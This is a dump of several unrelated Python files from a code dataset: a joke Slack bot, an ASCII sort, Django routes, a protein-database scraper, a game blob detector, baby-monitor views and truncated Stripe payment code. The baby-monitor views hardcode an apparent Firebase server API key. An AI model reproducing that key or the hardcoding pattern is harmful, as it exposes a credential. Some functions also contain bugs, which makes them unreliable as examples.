client.add_cog(ChatCommands(client))\r\n","sub_path":"modules/ChatCommands.py","file_name":"ChatCommands.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315942208","text":"#Asci numaralarına gore harfleri buyukten kucuge siralar.\ndef sort_str(s):\n s = list(s)\n print(s)\n arr = []\n secondArr = []\n\n for i in range(len(s)):\n x = ord(s[i])\n arr.append(x)\n arr.sort()\n #print(arr)\n\n for k in range(len(arr)):\n char = chr(arr[k])\n secondArr.append(char)\n print(secondArr)\n\nsort_str(\"hello\")","sub_path":"arrays/convertAsci.py","file_name":"convertAsci.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226579719","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport random\n\nlogger = logging.getLogger(__name__)\n\nclass Messenger(object):\n def __init__(self, slack_clients):\n self.clients = slack_clients\n\n def send_message(self, channel_id, msg):\n # in the case of Group and Private channels, RTM channel payload is a complex dictionary\n if isinstance(channel_id, dict):\n channel_id = channel_id['id']\n logger.debug('Sending msg: %s to channel: %s' % (msg, channel_id))\n channel = self.clients.rtm.server.channels.find(channel_id)\n channel.send_message(msg)\n\n def write_random(self, channel_id):\n sentences = [\n \"I really can't stress enough how important it is to submit to places like {}\",\n \"That reminds me of something I did at {}\",\n \"That reminds me of something I saw at {}\",\n \"Have I told you about {}?\",\n \"So we're looking to model IGGI after {}\",\n \"I'm really a fan of the way we were working at {} last year\",\n \":heart: {} :heart:\"\n ]\n events = [\n \"CEEC\",\n \"Dagstuhl\",\n \"the global game jam\"\n ]\n msg = random.choice(sentences).format(\n random.choice(events)\n )\n self.send_message(channel_id, msg)\n\n def write_advice(self, channel_id):\n sentences = [\n \"I really think {} are the future\",\n \"You know, {} are really powerful, and their shortcomings aren't really that important\",\n \"Have you considered using {}?\",\n \"There's loads of low-hanging fruit around {}\",\n \"You should try combining {} with {} - I think there's a lot of potential there\",\n \"The great thing about {} is that they're so simple, yet powerful\",\n \"I think give it a couple of years and you'll see a lot of games companies using {}\",\n \"A combination of {} and {}... yeah, that could be really powerful\",\n \"It's important to show the games industry that {} are a really promising field\",\n \"I've heard lots of mixed feedback about {} recently, but I think it's great\",\n \"I think we should try using {} to improve {}\",\n \"I think you're underestimating {} - they're really good, and could be used anywhere\",\n \"The fact that industry are ignoring {} means nothing - they're really the best\",\n \"You need to go out and tell industry all about {}. Or {} - I've not decided\"\n ]\n subject = [\n \"whale\",\n \"pigeon\",\n \"dinosaur\",\n \"tank\",\n \"game developer\",\n \"computer scientist\"\n ]\n technologies = [\n \"MCTS approaches\",\n \"deep learning approaches\",\n \"evolutionary algorithms\",\n \"game jams\",\n \"student-led interest groups\",\n \"Slack bots\",\n \"AI competitions\",\n \"\\\"AI guided game design\\\" approaches\",\n \"single layer perceptrons\",\n \"the IGGI training modules\",\n \"my speeches\",\n random.choice(subject) + \" dating sims\"\n ]\n msg = random.choice(sentences).format(\n random.choice(technologies),\n random.choice(technologies)\n )\n self.send_message(channel_id, msg)\n\n def write_grandiose(self, channel_id):\n countries = [\n \"Albania\",\n \"Algeria\",\n \"Argentina\",\n \"Armenia\",\n \"Australia\",\n \"Austria\",\n \"Bangladesh\",\n \"Barbados\",\n \"Belarus\",\n \"Belgium\",\n \"Bermuda\",\n \"Bolivia\",\n \"Botswana\",\n \"Brazil\",\n \"Bulgaria\",\n \"Cambodia\",\n \"Cameroon\",\n \"Canada\",\n \"Chile\",\n \"China\",\n \"Costa Rica\",\n \"Croatia\",\n \"Cuba\",\n \"Cyprus\",\n \"the Czech Republic\",\n \"Denmark\",\n \"Ecuador\",\n \"Egypt\",\n \"Estonia\",\n \"Finland\",\n \"France\",\n \"Gambia\",\n \"Georgia\",\n \"Germany\",\n \"Greenland\",\n \"Guam\",\n \"Guatemala\",\n \"Hungary\",\n \"Iceland\",\n \"India\",\n \"Indonesia\",\n \"Ireland\",\n \"Italy\",\n \"Jamaica\",\n \"Kenya\",\n \"Latvia\",\n \"Lithuania\",\n \"Luxembourg\",\n \"Macedonia\",\n \"Madagascar\",\n \"Malaysia\",\n \"Malta\",\n \"Monaco\",\n \"Mongolia\",\n \"Morocco\",\n \"Nigeria\",\n \"Oman\",\n \"Panama\",\n \"Paraguay\",\n \"Peru\",\n \"Poland\",\n \"Portugal\",\n \"Romania\",\n \"Russia\",\n \"Saudi Arabia\",\n \"Slovakia\",\n \"Slovenia\",\n \"South Africa\",\n \"Spain\",\n \"Switzerland\",\n \"Thailand\",\n \"Tunisia\",\n \"Turkey\",\n \"Uganda\",\n \"the Vatican\",\n \"Venezuela\",\n \"Vietnam\",\n \"Zambia\",\n \"Zimbabwe\"\n ]\n nouns = [\n \"police dog training\",\n \"professional calligraphy\",\n \"eSports\",\n \"film\",\n \"music\",\n \"goat-herding\",\n \"medical\",\n \"bot generation\"\n ]\n subjects = [\n \"games for dealing with mental health\",\n \"proving philosophical theories\",\n \"generating awesome art\",\n \"convincing the games industry that Java is performant\",\n \"some shit to do with linguistics\",\n \"reading brain signals to control games\",\n \"doing cool things with VR and AR\",\n \"getting AI researchers to admit they have emotions\",\n \"chasing up deadlines and conference budgets\",\n \"snarky bot generation\",\n \"artificial general intelligence\",\n \"getting us closer to the robot apocalypse\",\n \"finding more grant money\"\n ]\n sentences_start = [\n \"When I started this it all seemed crazy. Look at us now.\",\n \"Why is IGGI important? Let me tell you.\",\n \"Developers, developers, developers.\",\n \"Games. They're important.\",\n \"I'm not going to say too much - you're the important ones.\",\n \"I know everyone wants to be doing their own thing now, so I'll keep this quick.\"\n ]\n sentences_mid = [\n \" Everyone plays games. Even some animals play games.\",\n \" Every day we change the world {}%.\".format(random.randint(5,40)),\n \" I look around and see so many young, exciting researchers.\",\n \" Every single one of you students are technical, and that's great.\",\n \" The games industry are chomping at the bit to speak to us - so they should.\",\n \" The games industry is now larger than the {} industry and {} industry combined.\".format(random.choice(nouns), random.choice(nouns)),\n \" We're really exciting the games industry.\",\n \" We are now the largest group of games researchers in the world.\",\n \" We've got people here working on areas as diverse as {} and {}.\".format(random.choice(subjects), random.choice(subjects)),\n \" We've got software that has been downloaded {} of times.\".format(random.choice([\"thousands\", \"millions\", \"billions\", \"an infinite amount\"])),\n \" The games industry is bigger than the GDP of {}.\".format(random.choice(countries))\n ]\n sentences_end = [\n \" Just think about how great that is.\",\n \" And that's really exciting.\",\n \" And I really mean that.\",\n \".. I'm aware that I've been talking for ages now, so I'll shut up.\",\n \" And that's really exciting. Now over to you.\"\n ]\n self.send_message(channel_id, \"{}{}{}\".format(\n random.choice(sentences_start),\n random.choice(sentences_mid),\n random.choice(sentences_end)\n ))\n\n def write_about(self, channel_id):\n msg = \"I'm ProfBot, the totally unique and not-inspired-by-real-people Slack bot. Details at github.com/bedder/ProfBot\"\n self.send_message(channel_id, msg)\n\n def write_help(self, channel_id):\n sentences = [\n \"Uh huh, uh huh... I see what you're saying. Honest.\",\n \"Could you repeat that, with a few more buzzwords?\",\n \"I'm not sure I follow.\"\n ]\n self.send_message(channel_id, random.choice(setences))\n","sub_path":"bot/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"486852386","text":"from django.conf.urls import url\n#from mahasiswa import views\nfrom . import views\nfrom . import views as core_views\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n\n # url(r'^anggota/$', views.anggota, name='anggota'),\n url(r'anggota/', views.anggota, name='anggota'),\n url(r'^profil/', views.profil, name='profil'),\n url(r'^riset/', views.riset, name='riset'),\n url(r'^ebook/', views.ebook, name='ebook'),\n\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n url(r'^signup/$', core_views.signup, name='signup'),\n # # ex: /polls/5/0\n url(r'^profile/(?P[0-9]+)/$', views.detail, name='detail'),\n # # ex: /polls/5/results/\n # url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n # # ex: /polls/5/vote/\n # url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n\n url(r'^login/$', auth_views.login, name='login'),\n url(r'^logout/$', auth_views.logout, name='logout'),\n\n\n url(r'^model_form_upload/$', views.model_form_upload, name='model_form_upload'),\n url(r'^journal_form_upload/$', views.journal_form_upload, name='journal_form_upload'),\n url(r'^kontak/$', views.kontak, name='kontak'),\n] \n\n\n\n","sub_path":"src/mahasiswa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496588072","text":"#!/usr/bin/python\n# coding=utf-8\n\n###################################### 通过MMDB查看PDB的Polymeric state #\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nworkdir = 'E:/PremPS/ProteinStability/ProcessDataset/Datasets/'\n\nS2648 = open(workdir+'OriginalDataFromReferences/popmusic_S2648.txt','r')\nS2648.next()\npdblist = []\nfor line in S2648:\n newline = line.strip().split('\\t')\n pdb = newline[0].split('_')[0].strip().upper()\n if pdb not in pdblist:\n pdblist.append(pdb)\n\n# pdb = '1ACB'\n# url = 'https://www.rcsb.org/structure/{}'.format(pdb)\n# GetPDBinfo = requests.get(url)._content\n# soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n# soup.find_all('h5')\n# r'(\\d+)$'字符串最后面的一串数字\n# r'^(\\d+)'字符串最前面的一串数字\n# re.findall(r'(\\d+)$', soup.find('h5').text).pop(0)\n\n## 根据PDB数据库中的信息判断分类\n# classifyPDB = {}\n# for pdb in pdblist:\n# url = 'https://www.rcsb.org/structure/{}'.format(pdb)\n# GetPDBinfo = requests.get(url)._content\n# soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n# if len(soup.find_all('h5')) != 1:\n# classifyPDB[pdb] = 'Complex'\n# elif len(soup.find(attrs={'class':'ellipsisToolTip'}).text.split(',')) == 1:\n# classifyPDB[pdb] = 'Monomer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 2:\n# classifyPDB[pdb] = 'Dimer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 3:\n# classifyPDB[pdb] = 'Trimer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 4:\n# classifyPDB[pdb] = 'Tetramer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 5:\n# classifyPDB[pdb] = 'Pentamer'\n# elif len(soup.find(attrs={'class': 'ellipsisToolTip'}).text.split(',')) == 6:\n# classifyPDB[pdb] = 'Hexamer'\n# else:\n# classifyPDB[pdb] = 'Other'\n#\n# fw = open(workdir+'S2648ClassifyByPDB.txt','w')\n# fw.write('PDBid\\tClassify\\n')\n# for key in classifyPDB:\n# fw.write('%s\\t%s\\n'%(key,classifyPDB[key]))\n# fw.close()\n\n## 根据MMDB查找分类信息\nfw = open(workdir+'S2648ClassifyByMMDB_new.txt','w')\nfw.write('PDBid\\tClassify\\tSource\\n')\n\nfor pdb in pdblist:\n url = 'https://www.ncbi.nlm.nih.gov/Structure/mmdb/mmdbsrv.cgi?dps=1&uid={}'.format(pdb)\n GetPDBinfo = requests.get(url)._content\n soup = BeautifulSoup(GetPDBinfo, 'html.parser')\n try:\n classifylist = soup.find_all(attrs={'class':'biotext'})\n length = len(classifylist)\n i = 0\n while i < int(length):\n classify = classifylist[i].text.split(';')[0].split(':')[1]\n if 'PISA' in classifylist[i].text:\n source = 'PISA'\n elif 'author' in classifylist[i].text:\n source = 'author'\n else:\n source = 'other'\n fw.write(pdb+'\\t'+classify+'\\t'+source+'\\n')\n i = i+1\n except:\n fw.write(pdb +'\\tNONE\\tNONE\\n')\n\n# fw = open(workdir+'S2648ClassifyByMMDB.txt','w')\n# fw.write('PDBid\\tClassify\\n')\n# for key in classifyMMDB:\n# fw.write('%s\\t%s\\n'%(key,classifyMMDB[key]))\n# fw.close()\n\n# S2648 = open(workdir+'OriginalDataFromReferences/popmusic_S2648.txt','r')\n# title = S2648.next()\n# fw = open(workdir+'S2648AddClassify_1.txt','w')\n# newtitle = title.strip()+'\\t'+'PDBClassify'+'\\t'+'MMDBClassify'+'\\n'\n# fw.write(newtitle)\n# for line in S2648:\n# newline = line.strip().split('\\t')\n# pdb = newline[0].split('_')[0].strip().upper()\n# fw.write(line.strip()+'\\t'+classifyPDB[pdb]+'\\t'+classifyMMDB[pdb]+'\\n')\n# fw.close()","sub_path":"Webserver/Extract_Polymeric_FromMMDB.py","file_name":"Extract_Polymeric_FromMMDB.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"592680524","text":"from fishing_event import *\n\n\ndef GetKeypointFromImage(img):\n # Setup SimpleBlobDetector parameters.\n hsvImg = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n lower = (99, 254, 100)\n upper = (100, 255, 101)\n mask = cv2.inRange(hsvImg, lower, upper)\n\n # Setup SimpleBlobDetector parameters.\n params = cv2.SimpleBlobDetector_Params()\n\n # Change thresholds\n params.minThreshold = 10\n params.maxThreshold = 255\n\n params.filterByColor = True\n params.blobColor = 255\n\n params.filterByCircularity = False\n params.filterByConvexity = False\n params.filterByInertia = False\n\n params.filterByArea = True\n params.minArea = 10.0\n\n detector = cv2.SimpleBlobDetector_create(params)\n\n # Detect blobs.\n keypoints = detector.detect(mask)\n\n if len(keypoints) <= 0:\n return None\n\n return int(keypoints[0].pt[0]), int(keypoints[0].pt[1])\n\n\nclass PixelLoc:\n val = None\n\n @staticmethod\n def config():\n win = Window()\n t = GetKeypointFromImage(win.getCapture())\n\n if t is None:\n return False\n\n PixelLoc.val = (t[0], t[1], t[0] + 1, t[1] + 1)\n return True\n","sub_path":"pixel_loc.py","file_name":"pixel_loc.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441588225","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import *\nfrom account.models import User\nfrom .models import *\nimport cv2 as cv\nimport tensorflow\nimport logging\nimport secrets\nimport json\nfrom django.views.decorators.http import require_POST\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, HttpResponseForbidden, JsonResponse\nfrom parent.models import UserToken\nfrom babysecurity import settings\nimport requests\nlogger = logging.getLogger(__name__)\n\ndef frame2_happy(point):\n if bool(point) == False :\n return False\n else :\n return True\ndef frame3_hp(pt):\n for ptt in pt:\n u = pt[ptt]\n if u == True:\n return \"0\"\n if u == False:\n return \"1\"\n\ndef beingReverse(filePath):\n try:\n BODY_PARTS = {\"Nose\": 0, \"Neck\": 1, \"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"REye\": 14,\n \"LEye\": 15, \"REar\": 16, \"LEar\": 17, \"Background\": 18}\n POSE_PAIRS = [[\"Neck\", \"RShoulder\"], [\"Neck\", \"LShoulder\"], [\"RShoulder\", \"RElbow\"],\n [\"RElbow\", \"RWrist\"], [\"LShoulder\", \"LElbow\"], [\"LElbow\", \"LWrist\"],\n [\"Neck\", \"RHip\"], [\"RHip\", \"RKnee\"], [\"RKnee\", \"RAnkle\"], [\"Neck\", \"LHip\"],\n [\"LHip\", \"LKnee\"], [\"LKnee\", \"LAnkle\"], [\"Neck\", \"Nose\"], [\"Nose\", \"REye\"],\n [\"REye\", \"REar\"], [\"Nose\", \"LEye\"], [\"LEye\", \"LEar\"]]\n net = cv.dnn.readNetFromTensorflow(\"./graph_opt.pb\")\n img = cv.imread(filePath, cv.IMREAD_ANYCOLOR)\n net.setInput(cv.dnn.blobFromImage(img, 1.0, (368, 368), (127.5, 127.5, 127.5), swapRB=True, crop=False))\n out = net.forward()\n out = out[:, :19, :, :]\n assert (len(BODY_PARTS) == out.shape[1])\n points = []\n for i in range(len(BODY_PARTS)):\n heatMap = out[0, i, :, :]\n _, conf, _, point = cv.minMaxLoc(heatMap)\n x = (368 * point[0]) / out.shape[3]\n y = (368 * point[1]) / out.shape[2]\n points.append((int(x), int(y)) if conf > 0.2 else None)\n for pair in POSE_PAIRS:\n partFrom = pair[0]\n partTo = pair[1]\n assert (partFrom in BODY_PARTS)\n assert (partTo in BODY_PARTS)\n ap = frame2_happy(points[0])\n bp = frame2_happy(points[14])\n cp = frame2_happy(points[15])\n dp = frame2_happy(points[16])\n ep = frame2_happy(points[17])\n hp = [ap, bp, cp, dp, ep];\n result = 0\n result = frame3_hp(hp)\n return result\n except Exception as ex:\n print(ex)\n\ndef createProduction(request):\n if request.method == \"POST\":\n createProductionForm = CreationProductionForm(request.POST)\n if createProductionForm.is_valid():\n jsonResponse = {}\n try:\n createProduction = createProductionForm.save(commit=False)\n jsonResponse[\"status\"] = 1\n jsonResponse[\"authentication\"] = createProduction.authentication\n createProduction.save()\n except Exception as ex:\n logger.debug\n jsonResponse[\"status\"] = 1\n return JsonResponse(jsonResponse)\n else:\n return render(request, \"rasberrypy/createProduction.html\", {\n \"createProductionForm\": CreationProductionForm()\n })\n\ndef productAuth(request):\n try:\n if request.method == \"POST\":\n productActiveForm = ProductionActiveForm(request.POST)\n jsonObject = {}\n if productActiveForm.is_valid():\n user = User.objects.get(userId=productActiveForm.cleaned_data[\"userId\"])\n product = Product.objects.get(id=user.productionKey)\n if product.authentication == productActiveForm.cleaned_data[\"authentication\"]:\n product.isActive = True\n user.is_active = True\n product.save()\n user.save()\n else:\n logging.debug\n return JsonResponse(jsonObject)\n\n else:\n return render(request, \"rasberrypy/auth.html\", {\n \"productActiveForm\": ProductionActiveForm()\n })\n except Exception as ex:\n logger.debug\n\ndef imageUpload(request):\n if request.method == \"GET\":\n return render(request, \"rasberrypy/uploadImage.html\",{\n \"babyPictureForm\" : BabyPictureForm()\n })\n else:\n babyPicutreForm = BabyPictureForm(request.POST,request.FILES)\n if babyPicutreForm.is_valid():\n product = Product.objects.get(authentication=babyPicutreForm.cleaned_data[\"authentication\"])\n babyPicture = babyPicutreForm.save(commit=False)\n babyPicture.productionKey = product\n babyPicture.save()\n babyPicture.isReverse = beingReverse(settings.MEDIA_ROOT + \"/\" + babyPicture.realTitle)\n babyPicture.save()\n if babyPicture.isReverse:\n user = User.objects.get(productionKey=product.id)\n userToken = UserToken.objects.get(user = user )\n \n headers = {\"Authorization\" : \"key=AAAARenGXtY:APA91bGHctGwh5AmR7kJ6hVr0a-boD_BJoKhlHfjkswIeEJyJ91Kdp6iv3SLReRFIuRH26hUrhhM_eM8So8MGU0OLzH4jER_h5QQ8dhRCw0VeK0hv7y_HmDIxlJjZGuZpVVMcyFvqWwu\",\n \"Content-Type\" : \"application/json\"}\n\n\n dic = {\"data\" : {\"IsReverse\" : \"Reverse\"},\"to\": userToken.token,\"priority\":\"high\"}\n requests.post(\"https://fcm.googleapis.com/fcm/send\",data=json.dumps(dic),headers = headers)\n return JsonResponse(dic)\n return render(request, \"rasberrypy/uploadImage.html\", {\n \"babyPictureForm\": BabyPictureForm()\n })\n\ndef createBabyTemperature(request):\n if request.method == \"GET\":\n return render(request, \"rasberrypy/createBabyTemperature.html\",{\n \"babySickForm\" : BabySickForm()\n })\n else:\n babySickForm = BabySickForm(request.POST)\n if babySickForm.is_valid():\n product = Product.objects.get(authentication=babySickForm.cleaned_data[\"authentication\"])\n babySick = babySickForm.save(commit=False)\n babySick.productionKey = product\n babySickForm.save()\n\n\n@require_POST\n@csrf_exempt\ndef startStream(request):\n stream = get_object_or_404(Stream, key=request.POST[\"name\"])\n if not stream.user.is_active:\n return HttpResponseForbidden(\"Inactive user\")\n\n if stream.started_at:\n return HttpResponseForbidden(\"Already streaming\")\n\n stream.save()\n\n # Redirect to the streamer's public username\n return redirect(stream.productKey)\n\n@require_POST\n@csrf_exempt\ndef stop_stream(request):\n Stream.objects.filter(key=request.POST[\"name\"]).update(createTime=None)\n return HttpResponse(\"OK\")\n","sub_path":"rasberrypy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"497943190","text":"from decimal import Decimal\nfrom time import sleep\n\nfrom psycopg2.extras import execute_batch\nimport stripe\nimport stripe.error\n\nfrom ..exceptions import NextAction\nfrom ..i18n.currencies import Money\nfrom ..models.exchange_route import ExchangeRoute\nfrom ..website import website\nfrom .common import abort_payin, resolve_amounts, update_payin, update_payin_transfer\n\n\n# https://stripe.com/docs/currencies#presentment-currencies\nZERO_DECIMAL_CURRENCIES = \"\"\"\n BIF CLP DJF GNF JPY KMF KRW MGA PYG RWF UGX VND VUV XAF XOF XPF\n\"\"\".split()\n\n\ndef int_to_Money(amount, currency):\n currency = currency.upper()\n if currency in ZERO_DECIMAL_CURRENCIES:\n return Money(Decimal(amount), currency)\n return Money(Decimal(amount) / 100, currency)\n\n\ndef Money_to_int(m):\n if m.currency in ZERO_DECIMAL_CURRENCIES:\n return int(m.amount)\n return int(m.amount * 100)\n\n\ndef repr_stripe_error(e):\n \"\"\"Given a `StripeError` exception, return an error message suitable for display.\n \"\"\"\n msg = e.user_message or e.code\n return '%s (request ID: %s)' % (msg, e.request_id)\n\n\ndef repr_charge_error(charge):\n \"\"\"Given a `Charge` object, return an error message suitable for display.\n \"\"\"\n if charge.status != 'failed':\n return\n return '%s (code %s)' % (charge.failure_message, charge.failure_code)\n\n\ndef get_partial_iban(sepa_debit):\n return '%s⋯%s' % (sepa_debit.country, sepa_debit.last4)\n\n\ndef charge_and_transfer(db, payin, payer, statement_descriptor, on_behalf_of=None):\n \"\"\"Create a standalone Charge then multiple Transfers.\n\n Doc: https://stripe.com/docs/connect/charges-transfers\n\n As of January 2019 this only works if the recipients are in the SEPA.\n\n \"\"\"\n assert payer.id == payin.payer\n amount = payin.amount\n route = ExchangeRoute.from_id(payer, payin.route)\n intent = None\n try:\n if route.address.startswith('pm_'):\n intent = stripe.PaymentIntent.create(\n amount=Money_to_int(amount),\n confirm=True,\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=on_behalf_of,\n payment_method=route.address,\n return_url=payer.url('giving/pay/stripe/%i' % payin.id),\n statement_descriptor=statement_descriptor,\n idempotency_key='payin_intent_%i' % payin.id,\n )\n else:\n charge = stripe.Charge.create(\n amount=Money_to_int(amount),\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=on_behalf_of,\n source=route.address,\n statement_descriptor=statement_descriptor,\n expand=['balance_transaction'],\n idempotency_key='payin_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n return abort_payin(db, payin, repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return abort_payin(db, payin, str(e))\n if intent:\n if intent.status == 'requires_action':\n update_payin(db, payin.id, None, 'awaiting_payer_action', None,\n intent_id=intent.id)\n raise NextAction(intent)\n else:\n charge = intent.charges.data[0]\n intent_id = getattr(intent, 'id', None)\n payin = settle_charge_and_transfers(db, payin, charge, intent_id=intent_id)\n send_payin_notification(payin, payer, charge, route)\n return payin\n\n\ndef destination_charge(db, payin, payer, statement_descriptor):\n \"\"\"Create a Destination Charge.\n\n Doc: https://stripe.com/docs/connect/destination-charges\n\n Destination charges don't have built-in support for processing payments\n \"at cost\", so we (mis)use transfer reversals to recover the exact amount of\n the Stripe fee.\n\n \"\"\"\n assert payer.id == payin.payer\n pt = db.one(\"SELECT * FROM payin_transfers WHERE payin = %s\", (payin.id,))\n destination = db.one(\"SELECT id FROM payment_accounts WHERE pk = %s\", (pt.destination,))\n amount = payin.amount\n route = ExchangeRoute.from_id(payer, payin.route)\n intent = None\n if destination == 'acct_1ChyayFk4eGpfLOC':\n # Stripe rejects the charge if the destination is our own account\n destination = None\n try:\n if route.address.startswith('pm_'):\n intent = stripe.PaymentIntent.create(\n amount=Money_to_int(amount),\n confirm=True,\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n metadata={'payin_id': payin.id},\n on_behalf_of=destination,\n payment_method=route.address,\n return_url=payer.url('giving/pay/stripe/%i' % payin.id),\n statement_descriptor=statement_descriptor,\n transfer_data={'destination': destination} if destination else None,\n idempotency_key='payin_intent_%i' % payin.id,\n )\n else:\n charge = stripe.Charge.create(\n amount=Money_to_int(amount),\n currency=amount.currency.lower(),\n customer=route.remote_user_id,\n destination={'account': destination} if destination else None,\n metadata={'payin_id': payin.id},\n source=route.address,\n statement_descriptor=statement_descriptor,\n expand=['balance_transaction'],\n idempotency_key='payin_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n return abort_payin(db, payin, repr_stripe_error(e))\n except Exception as e:\n website.tell_sentry(e, {})\n return abort_payin(db, payin, str(e))\n if intent:\n if intent.status == 'requires_action':\n update_payin(db, payin.id, None, 'awaiting_payer_action', None,\n intent_id=intent.id)\n raise NextAction(intent)\n else:\n charge = intent.charges.data[0]\n intent_id = getattr(intent, 'id', None)\n payin = settle_destination_charge(db, payin, charge, pt, intent_id=intent_id)\n send_payin_notification(payin, payer, charge, route)\n return payin\n\n\ndef send_payin_notification(payin, payer, charge, route):\n \"\"\"Send the legally required notification for SEPA Direct Debits.\n \"\"\"\n if route.network == 'stripe-sdd' and charge.status != 'failed':\n if route.address.startswith('pm_'):\n raise NotImplementedError()\n else:\n sepa_debit = stripe.Source.retrieve(route.address).sepa_debit\n payer.notify(\n 'payin_sdd_created',\n force_email=True,\n payin_id=payin.id, # unused but required for uniqueness\n payin_amount=payin.amount,\n bank_name=getattr(sepa_debit, 'bank_name', None),\n partial_bank_account_number=get_partial_iban(sepa_debit),\n mandate_url=sepa_debit.mandate_url,\n mandate_id=sepa_debit.mandate_reference,\n mandate_creation_date=route.ctime.date(),\n creditor_identifier=website.app_conf.sepa_creditor_identifier,\n )\n\n\ndef settle_payin(db, payin):\n \"\"\"Check the status of a payin, take appropriate action if it has changed.\n \"\"\"\n if payin.intent_id:\n intent = stripe.PaymentIntent.retrieve(payin.intent_id)\n if intent.status == 'requires_action':\n raise NextAction(intent)\n err = intent.last_payment_error\n if err and intent.status in ('requires_payment_method', 'canceled'):\n charge_id = getattr(err, 'charge', None)\n return update_payin(db, payin.id, charge_id, 'failed', err.message)\n if intent.charges.data:\n charge = intent.charges.data[0]\n else:\n return payin\n else:\n charge = stripe.Charge.retrieve(payin.remote_id)\n return settle_charge(db, payin, charge)\n\n\ndef settle_charge(db, payin, charge):\n \"\"\"Handle a charge's status change.\n \"\"\"\n if charge.destination:\n pt = db.one(\"SELECT * FROM payin_transfers WHERE payin = %s\", (payin.id,))\n return settle_destination_charge(db, payin, charge, pt)\n else:\n return settle_charge_and_transfers(db, payin, charge)\n\n\ndef settle_charge_and_transfers(db, payin, charge, intent_id=None):\n \"\"\"Record the result of a charge, and execute the transfers if it succeeded.\n \"\"\"\n if getattr(charge, 'balance_transaction', None):\n bt = charge.balance_transaction\n if isinstance(bt, str):\n bt = stripe.BalanceTransaction.retrieve(bt)\n amount_settled = int_to_Money(bt.amount, bt.currency)\n fee = int_to_Money(bt.fee, bt.currency)\n net_amount = amount_settled - fee\n else:\n amount_settled, fee, net_amount = None, None, None\n\n error = repr_charge_error(charge)\n payin = update_payin(\n db, payin.id, charge.id, charge.status, error,\n amount_settled=amount_settled, fee=fee, intent_id=intent_id\n )\n\n if amount_settled is not None:\n # We have to update the transfer amounts in a single transaction to\n # avoid ending up in an inconsistent state.\n with db.get_cursor() as cursor:\n payin_transfers = cursor.all(\"\"\"\n SELECT id, amount\n FROM payin_transfers\n WHERE payin = %s\n ORDER BY id\n FOR UPDATE\n \"\"\", (payin.id,))\n transfer_amounts = resolve_amounts(net_amount, {\n pt.id: pt.amount.convert(amount_settled.currency) for pt in payin_transfers\n })\n args_list = [\n (transfer_amounts[pt.id], pt.id) for pt in payin_transfers\n if pt.amount != transfer_amounts[pt.id]\n ]\n if args_list:\n execute_batch(cursor, \"\"\"\n UPDATE payin_transfers\n SET amount = %s\n WHERE id = %s\n AND status <> 'succeeded';\n \"\"\", args_list)\n\n payin_transfers = db.all(\"\"\"\n SELECT pt.*, pa.id AS destination_id\n FROM payin_transfers pt\n JOIN payment_accounts pa ON pa.pk = pt.destination\n WHERE pt.payin = %s\n ORDER BY pt.id\n \"\"\", (payin.id,))\n if amount_settled is not None:\n for pt in payin_transfers:\n if pt.destination_id == 'acct_1ChyayFk4eGpfLOC':\n update_payin_transfer(db, pt.id, None, charge.status, error)\n elif pt.status == 'pre':\n execute_transfer(db, pt, pt.destination_id, charge.id)\n elif charge.status == 'failed':\n for pt in payin_transfers:\n update_payin_transfer(db, pt.id, None, charge.status, error)\n\n return payin\n\n\ndef execute_transfer(db, pt, destination, source_transaction):\n \"\"\"Create a Transfer.\n\n Args:\n pt (Record): a row from the `payin_transfers` table\n destination (str): the Stripe ID of the destination account\n source_transaction (str): the ID of the Charge this transfer is linked to\n\n Returns:\n Record: the row updated in the `payin_transfers` table\n\n \"\"\"\n try:\n tr = stripe.Transfer.create(\n amount=Money_to_int(pt.amount),\n currency=pt.amount.currency,\n destination=destination,\n metadata={'payin_transfer_id': pt.id},\n source_transaction=source_transaction,\n idempotency_key='payin_transfer_%i' % pt.id,\n )\n except stripe.error.StripeError as e:\n if e.code == 'idempotency_key_in_use':\n # Two threads are submitting 